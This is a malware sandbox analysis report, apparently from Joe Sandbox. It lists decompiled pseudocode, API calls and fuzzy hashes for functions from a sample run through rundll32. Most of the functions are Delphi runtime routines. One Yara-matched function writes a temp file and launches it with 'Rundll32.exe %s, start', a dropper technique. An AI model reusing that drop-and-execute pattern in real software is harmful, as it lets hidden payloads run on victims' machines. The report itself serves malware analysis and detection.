				_t10 = GetCurrentThreadId();
				 *0x194030 = _t10;
				return _t10;
			}







                                            0x001853b9
                                            0x001853be
                                            0x001853c3
                                            0x001853c5
                                            0x001853cc
                                            0x001853d6
                                            0x001853e0
                                            0x001853e7
                                            0x001853f8
                                            0x001853fa
                                            0x001853fa
                                            0x001853ff
                                            0x00185404
                                            0x0018540d
                                            0x00185416
                                            0x00185424
                                            0x00185429
                                            0x0018542e
                                            0x00185433
                                            0x00185438
                                            0x00185442
                                            0x0018547b
                                            0x00185444
                                            0x00185444
                                            0x00185452
                                            0x0018546a
                                            0x00185454
                                            0x00185454
                                            0x00185454
                                            0x00185452
                                            0x00185480
                                            0x00185485
                                            0x0018548a

                                            APIs
                                              • Part of subcall function 00182CB4: GetKeyboardType.USER32 ref: 00182CB9
                                              • Part of subcall function 00182CB4: GetKeyboardType.USER32 ref: 00182CC5
                                            • GetCommandLineA.KERNEL32 ref: 0018541F
                                            • 734E569E.KERNEL32 ref: 00185433
                                            • 734E569E.KERNEL32 ref: 00185444
                                            • GetCurrentThreadId.KERNEL32 ref: 00185480
                                              • Part of subcall function 00182CE4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D06
                                              • Part of subcall function 00182CE4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00182D55,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D39
                                              • Part of subcall function 00182CE4: RegCloseKey.ADVAPI32(?,00182D5C,00000000,?,00000004,00000000,00182D55,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D4F
                                            • GetThreadLocale.KERNEL32 ref: 00185460
                                              • Part of subcall function 001852F0: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00185356), ref: 00185316
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: E569KeyboardLocaleThreadType$CloseCommandCurrentInfoLineOpenQueryValue
                                            • String ID:
                                            • API String ID: 2578515257-0
                                            • Opcode ID: e8f2452db18940056e722f63600ab63e56c80be294fab9ee6aae97cb5a52a6ee
                                            • Instruction ID: 0812f8db6dcd01e3de56bafbdf83a0162eae031e82eca22e800cb21e30f15ca7
                                            • Opcode Fuzzy Hash: e8f2452db18940056e722f63600ab63e56c80be294fab9ee6aae97cb5a52a6ee
                                            • Instruction Fuzzy Hash: BF0156B24047419BE720BFF4AC467593AA5FB22354F5A041BE64456673EB3803C7CF62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00182CE4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 65%
                                            			E00182CE4() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x193020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x193020; // 0x27f
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x193020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00182D55);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x182d5c);
					return RegCloseKey(_v8);
				}
			}












                                            0x00182ce5
                                            0x00182ce7
                                            0x00182cf1
                                            0x00182d0d
                                            0x00182d5c
                                            0x00182d6e
                                            0x00182d71
                                            0x00182d7a
                                            0x00182d0f
                                            0x00182d11
                                            0x00182d12
                                            0x00182d17
                                            0x00182d1a
                                            0x00182d1d
                                            0x00182d39
                                            0x00182d40
                                            0x00182d43
                                            0x00182d46
                                            0x00182d54
                                            0x00182d54

                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D06
                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00182D55,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D39
                                            • RegCloseKey.ADVAPI32(?,00182D5C,00000000,?,00000004,00000000,00182D55,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D4F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                            • API String ID: 3677997916-4173385793
                                            • Opcode ID: 847eaa29db7e344422379f70c1730705dcb3e21127f6ac9cb7ae5acdacd419c4
                                            • Instruction ID: 267d2f44d4f8ccff69392dc84e46ba6a043e3a791d01447227e54c1125ed26f6
                                            • Opcode Fuzzy Hash: 847eaa29db7e344422379f70c1730705dcb3e21127f6ac9cb7ae5acdacd419c4
                                            • Instruction Fuzzy Hash: 3F017575A40708BAD712FBD0DD42BEDBBBCEB08B00F500661FA14D6590E7745B51CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001897D4, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E001897D4(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x18986b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0018954C(GetThreadLocale(), 0x189880, 0x100b,  &_v8);
				_t29 = E00186AC0(0x189880, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00189720, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x194768;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0018975C, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E00189872);
				return E00183980( &_v8);
			}










                                            0x001897d4
                                            0x001897d7
                                            0x001897dc
                                            0x001897dd
                                            0x001897e2
                                            0x001897e5
                                            0x001897fb
                                            0x0018980d
                                            0x00189817
                                            0x00189827
                                            0x0018982c
                                            0x00189831
                                            0x00189836
                                            0x00189836
                                            0x0018983c
                                            0x0018983f
                                            0x0018983f
                                            0x00189850
                                            0x00189850
                                            0x00189857
                                            0x0018985a
                                            0x0018985d
                                            0x0018986a

                                            APIs
                                            • GetThreadLocale.KERNEL32(?,00000000,0018986B,?,?,00000000), ref: 001897EC
                                              • Part of subcall function 0018954C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0018956A
                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0018986B,?,?,00000000), ref: 0018981C
                                            • EnumCalendarInfoA.KERNEL32(Function_00009720,00000000,00000000,00000004), ref: 00189827
                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0018986B,?,?,00000000), ref: 00189845
                                            • EnumCalendarInfoA.KERNEL32(Function_0000975C,00000000,00000000,00000003), ref: 00189850
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Locale$InfoThread$CalendarEnum
                                            • String ID:
                                            • API String ID: 4102113445-0
                                            • Opcode ID: d157d7c4ec5c680bebe094e9e3fc0b69995ea596528d55378e2566704908474c
                                            • Instruction ID: 7877a1caf44029956df8431415983c08c65cfb8a2f933c1a42291b5f1e8ac7bf
                                            • Opcode Fuzzy Hash: d157d7c4ec5c680bebe094e9e3fc0b69995ea596528d55378e2566704908474c
                                            • Instruction Fuzzy Hash: 8701F230A00A48ABE711BA648C13F6E729DDBA7B14FA90560F511AA6D0E7649F008FA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00189884, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00189884(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x189a4e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00183980(__edx);
				E0018954C(GetThreadLocale(), 0x189a64, 0x1009,  &_v12);
				if(E00186AC0(0x189a64, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00183C1C(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x193114], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00186F5C(_t124 + _t92 - 1, 2, 0x189a68);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00186F5C(_t124 + _t92 - 1, 4, 0x189a78);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00186F5C(_t124 + _t92 - 1, 2, 0x189a90);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00183C24(_t122, 0x189aa8);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00183B68();
												E00183C24(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00183C24(_t122, 0x189a9c);
										_t92 = _t92 + 1;
									}
								} else {
									E00183C24(_t122, 0x189a88);
									_t92 = _t92 + 3;
								}
							} else {
								E00183C24(_t122, 0x189a74);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0018A7E8(_t124, _t92);
							E00183E64(_t124, _v8, _t92,  &_v20);
							E00183C24(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x194740; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E001839D4(_t122, _t124);
					} else {
						while(_t92 <= E00183C1C(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00183B68();
									E00183C24(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E00189A55);
				return E001839A4( &_v24, 4);
			}























                                            0x00189884
                                            0x00189889
                                            0x0018988a
                                            0x0018988b
                                            0x0018988c
                                            0x0018988d
                                            0x00189891
                                            0x00189893
                                            0x00189897
                                            0x00189898
                                            0x0018989d
                                            0x001898a0
                                            0x001898a3
                                            0x001898aa
                                            0x001898c2
                                            0x001898da
                                            0x00189a24
                                            0x00189a26
                                            0x00189a2b
                                            0x00189a2d
                                            0x00000000
                                            0x00000000
                                            0x00189943
                                            0x00189948
                                            0x0018994f
                                            0x0018998d
                                            0x00189992
                                            0x00189994
                                            0x001899b3
                                            0x001899b8
                                            0x001899ba
                                            0x001899db
                                            0x001899e0
                                            0x001899e2
                                            0x001899f7
                                            0x001899f7
                                            0x001899f9
                                            0x001899ff
                                            0x00189a06
                                            0x001899fb
                                            0x001899fb
                                            0x001899fd
                                            0x00189a14
                                            0x00189a1e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x001899fd
                                            0x001899e4
                                            0x001899eb
                                            0x001899f0
                                            0x001899f0
                                            0x001899bc
                                            0x001899c3
                                            0x001899c8
                                            0x001899c8
                                            0x00189996
                                            0x0018999d
                                            0x001899a2
                                            0x001899a2
                                            0x00189a23
                                            0x00189a23
                                            0x00189951
                                            0x0018995a
                                            0x00189968
                                            0x00189972
                                            0x00189977
                                            0x00189977
                                            0x0018994f
                                            0x001898e0
                                            0x001898e0
                                            0x001898e5
                                            0x001898e8
                                            0x001898f6
                                            0x001898f2
                                            0x001898f2
                                            0x001898f2
                                            0x001898fa
                                            0x00189935
                                            0x001898fc
                                            0x00189921
                                            0x00189902
                                            0x00189902
                                            0x00189904
                                            0x00189906
                                            0x00189908
                                            0x00189911
                                            0x0018991b
                                            0x0018991b
                                            0x00189908
                                            0x00189920
                                            0x00189920
                                            0x00189920
                                            0x0018992c
                                            0x001898fa
                                            0x00189a33
                                            0x00189a35
                                            0x00189a38
                                            0x00189a3b
                                            0x00189a4d

                                            APIs
                                            • GetThreadLocale.KERNEL32(?,00000000,00189A4E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 001898B3
                                              • Part of subcall function 0018954C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0018956A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Locale$InfoThread
                                            • String ID: eeee$ggg$yyyy
                                            • API String ID: 4232894706-1253427255
                                            • Opcode ID: 52d2b2dd80f46ab30fe8c7e9a8e728bb42391d6ec7c0d4dd6ebc476206fdf50c
                                            • Instruction ID: d06ec677849a0ca4b3f4ec5a4c2f0b4429ff22f0d19ac4a7e01b84a797d184a8
                                            • Opcode Fuzzy Hash: 52d2b2dd80f46ab30fe8c7e9a8e728bb42391d6ec7c0d4dd6ebc476206fdf50c
                                            • Instruction Fuzzy Hash: 73412835B041054BC719BAA8C8922BEF3EADB95B04F6C1466F462E3306DB21DF029F21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C3B30, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			E001C3B30(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v264;
				char _v524;
				char _v784;

				GetTempPathA(0x104,  &_v524);
				GetTempFileNameA( &_v524, "BN", 0,  &_v264);
				if(E001C3AC0(_a4,  &_v264, _a4, _a8) != 1) {
					return 0;
				}
				_push(_a8);
				if(E001C33C0(_a4) != 1) {
					return E001C36C0( &_v264);
				}
				wsprintfA( &_v784, "Rundll32.exe %s, start",  &_v264);
				return E001C36C0( &_v784);
			}






                                            0x001c3b45
                                            0x001c3b60
                                            0x001c3b80
                                            0x00000000
                                            0x001c3bd7
                                            0x001c3b85
                                            0x001c3b95
                                            0x00000000
                                            0x001c3bd2
                                            0x001c3baa
                                            0x00000000

                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?), ref: 001C3B45
                                            • GetTempFileNameA.KERNEL32(?,001C42C0,00000000,?), ref: 001C3B60
                                              • Part of subcall function 001C3AC0: CreateFileA.KERNEL32(001C1691,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001C3AE6
                                              • Part of subcall function 001C3AC0: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 001C3B07
                                              • Part of subcall function 001C3AC0: CloseHandle.KERNEL32(000000FF), ref: 001C3B11
                                            • wsprintfA.USER32 ref: 001C3BAA
                                              • Part of subcall function 001C36C0: CreateProcessA.KERNEL32(00000000,001C3BD2,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001C36F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreateTemp$CloseHandleNamePathProcessWritewsprintf
                                            • String ID: Rundll32.exe %s, start
                                            • API String ID: 130250823-2967502992
                                            • Opcode ID: f0f0216fd8791722fa0fd7a4ea1248eb632a30374cbe44f9c46d9da5e2277d8c
                                            • Instruction ID: 337c9b921d21bf798f447ebda7c37dff192c02a6746b7801e5bc96e0d5443e78
                                            • Opcode Fuzzy Hash: f0f0216fd8791722fa0fd7a4ea1248eb632a30374cbe44f9c46d9da5e2277d8c
                                            • Instruction Fuzzy Hash: A3118CB99041186BD710DB90FC96FE9737CAB74304F00C698FA5986141E771DB988B92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018B04C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E0018B04C() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_push("GetDiskFreeSpaceExA");
					_push(_t3);
					L00185740();
					 *0x193138 = _t1;
				}
				if( *0x193138 == 0) {
					 *0x193138 = E00186E8C;
					return E00186E8C;
				}
				return _t1;
			}





                                            0x0018b052
                                            0x0018b057
                                            0x0018b05b
                                            0x0018b05d
                                            0x0018b062
                                            0x0018b063
                                            0x0018b068
                                            0x0018b068
                                            0x0018b074
                                            0x0018b07b
                                            0x00000000
                                            0x0018b07b
                                            0x0018b081

                                            APIs
                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0018B975,00000000,0018B988), ref: 0018B052
                                            • 7248FFF6.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0018B975,00000000,0018B988), ref: 0018B063
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: 7248HandleModule
                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                            • API String ID: 3866045432-3712701948
                                            • Opcode ID: cf339014768ce2f856825d31b9e32929126e2e3a5a268a1ac2007c0a705d53d5
                                            • Instruction ID: 630335d0258677e84e83bafe9cbb7ea09765274447f368931fcac0bc66ffe845
                                            • Opcode Fuzzy Hash: cf339014768ce2f856825d31b9e32929126e2e3a5a268a1ac2007c0a705d53d5
                                            • Instruction Fuzzy Hash: E8D0C9A4609746AEE720BBB09CD2B1B35A9D711724FA00037B1205A672D7B58FC84F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018CD54, Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E0018CD54(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0018CC34(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0018BE44();
							E0018CC34(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0018BE4C();
							E0018CC34(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0018CCF8(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0018CCC8(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0018BE54();
						E0018CC34(_v780);
						E0018CF4C(_v792);
					}
				}
				L15:
				_push(_v776);
				L0018B9E0();
				return E0018CC34(_v776);
			}






















                                            0x0018cd60
                                            0x0018cd70
                                            0x0018cd77
                                            0x0018cd77
                                            0x0018cd82
                                            0x0018cd90
                                            0x0018cd9f
                                            0x0018cdbd
                                            0x0018cda1
                                            0x0018cdac
                                            0x0018cdac
                                            0x0018cdcc
                                            0x0018cdd8
                                            0x0018cddb
                                            0x0018cddd
                                            0x0018cdde
                                            0x0018cde0
                                            0x0018cde6
                                            0x0018cde8
                                            0x0018cdf7
                                            0x0018cdf8
                                            0x0018ce02
                                            0x0018ce03
                                            0x0018ce08
                                            0x0018ce13
                                            0x0018ce14
                                            0x0018ce1e
                                            0x0018ce1f
                                            0x0018ce24
                                            0x0018ce3f
                                            0x0018ce41
                                            0x0018ce42
                                            0x0018ce45
                                            0x0018ce45
                                            0x0018cde6
                                            0x0018ce4e
                                            0x0018ce51
                                            0x0018ce53
                                            0x0018ce54
                                            0x0018ce5a
                                            0x0018ce60
                                            0x0018ce62
                                            0x0018ce64
                                            0x0018ce67
                                            0x0018ce6a
                                            0x0018ce6a
                                            0x0018ce6d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0018ce6d
                                            0x0018ce6d
                                            0x0018ce74
                                            0x0018ce7f
                                            0x0018ce87
                                            0x0018ce8e
                                            0x0018ce95
                                            0x0018ce96
                                            0x0018ce9b
                                            0x0018cea6
                                            0x0018cea6
                                            0x0018ceb4
                                            0x0018ceb8
                                            0x0018cebe
                                            0x0018cebf
                                            0x0018cecf

                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0018CE03
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0018CE1F
                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0018CE96
                                            • VariantClear.OLEAUT32(?), ref: 0018CEBF
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                            • String ID:
                                            • API String ID: 920484758-0
                                            • Opcode ID: d68851b79baf669237e5b1deb7cedb0c213449e6e11e02c7683a4bb073e56b58
                                            • Instruction ID: 716130d66e662901001e8c9ca2f47db09b1fd55e9fea527d8dbceb754a0e2e70
                                            • Opcode Fuzzy Hash: d68851b79baf669237e5b1deb7cedb0c213449e6e11e02c7683a4bb073e56b58
                                            • Instruction Fuzzy Hash: 2041F875A0161D9FCB61EB58CC91BC9B7BCAB58700F0042E5E648A7212DB34AF858FA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00189AB8, Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00189AB8(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x194660; // 0x180000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00189AAC(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E00186F28( &_v273, 0x104, E0018A938(0x5c) + 1);
				_t74 = 0x189c38;
				_t86 = 0x189c38;
				_t83 =  *0x185b74; // 0x185bc0
				if(E00182FD0(_t87, _t83) != 0) {
					_t74 = E00183E0C( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00186F00(_t74, 0x189c38);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x189c3c;
					}
				}
				_t51 =  *0x193578; // 0x185924
				_t16 = _t51 + 4; // 0xffe7
				_t53 =  *0x194660; // 0x180000
				LoadStringA(E00184840(_t53),  *_t16,  &_v790, 0x100);
				E00182DBC( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00187448(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00186F00(_v8, _t86);
			}































                                            0x00189ab8
                                            0x00189ac4
                                            0x00189ac7
                                            0x00189ac9
                                            0x00189ad5
                                            0x00189ae4
                                            0x00189b0e
                                            0x00189b14
                                            0x00189b20
                                            0x00189b25
                                            0x00189b2b
                                            0x00189b2b
                                            0x00189b49
                                            0x00189b4e
                                            0x00189b53
                                            0x00189b5a
                                            0x00189b67
                                            0x00189b71
                                            0x00189b75
                                            0x00189b7c
                                            0x00189b85
                                            0x00189b85
                                            0x00189b7c
                                            0x00189b96
                                            0x00189b9b
                                            0x00189b9f
                                            0x00189baa
                                            0x00189bb7
                                            0x00189bc2
                                            0x00189bc8
                                            0x00189bd5
                                            0x00189bdb
                                            0x00189be5
                                            0x00189beb
                                            0x00189bf2
                                            0x00189bf8
                                            0x00189bff
                                            0x00189c05
                                            0x00189c21
                                            0x00189c34

                                            APIs
                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00189AD5
                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00189AF9
                                            • GetModuleFileNameA.KERNEL32(00180000,?,00000105), ref: 00189B14
